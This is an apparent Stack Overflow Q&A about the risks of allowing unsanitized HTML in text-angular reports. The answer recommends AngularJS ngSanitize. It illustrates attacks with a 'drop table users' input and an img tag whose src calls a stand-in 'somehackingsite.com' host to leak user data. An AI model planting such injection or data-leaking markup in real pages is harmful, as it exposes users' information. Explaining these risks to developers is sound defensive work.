0

What's the risk of allowing the user generate unsanitized html? I am using text-angular and want to use:

 ta-unsafe-sanitizer="true"

https://github.com/fraywing/textAngular/issues/233

Now - I imagine 99.9% of the people reading this have no idea what text-angular is, so I am mainly interested in the overall consequences of allowing raw html.

VSO
  • 11,546
  • 25
  • 99
  • 187
  • It depends on what you're doing with that data. Do you ever show it to other users? – JJJ Nov 16 '15 at 22:54
  • It's for generating reports. Other users can see the reports organization administrators generate. The guys building these reports are organization administrators. For example, it would be a manager over-seeing multiple offices. I don't care what they make their users see, as long as it doesn't give them access to restricted backend elements, which I can't imagine it doing. – VSO Nov 16 '15 at 22:55
  • No, but if other user see it there could be malicious JavaScript inserted by a manager. Of course, this does not have to be done voluntarily, but instead also by some virus or an attacker in any way. Basically anything that could go wrong if arbitrary JavaScript is included into a users browser _could_ theoretically go wrong. – dirkk Nov 16 '15 at 23:04
  • just because you leave your door unlocked doesn't mean you'll get burglarized; a pro can get in through locks, but it makes it easier for a crackhead to mess up your afternoon with less effort... – dandavis Nov 17 '15 at 00:47

1 Answers1

1

Assume that you have a form element with inputs, and the user insert to the input something like drop table users. If you have weak server code or some service that you have no idea what it's security level you can loose your data. Now, this is an example. There is a lot of ways to do bad things in similiar way.

Other example is to insert to images src some url with query paramters like

<img 
   src='http://somehackingsite.com/images/lol.png?userIp="some scriptor other hacking style"' />

AngularJs offers a way to solve it by ngSanitize

Sanitizes an html string by stripping all potentially dangerous tokens.

The input is sanitized by parsing the HTML into tokens. All safe tokens (from a whitelist) are then serialized back to properly escaped html string. This means that no unsafe input can make it into the returned string.

The whitelist for URL sanitization of attribute values is configured using the functions aHrefSanitizationWhitelist and imgSrcSanitizationWhitelist of $compileProvider.

Dvir
  • 3,287
  • 1
  • 21
  • 33
  • But this all just pretend-protection, right? Because I can pass that string directly to the API. – VSO Nov 16 '15 at 23:54
  • Of course. It's only protection from the GUI. But when angular parse it on your website it's can protect your users also. For example someone success to reach you server and add some script to an image element that everyone should see. – Dvir Nov 16 '15 at 23:56
  • Thanks for your reply, I am going to let this run for a bit, but I will definitely come back to accept an answer. – VSO Nov 16 '15 at 23:59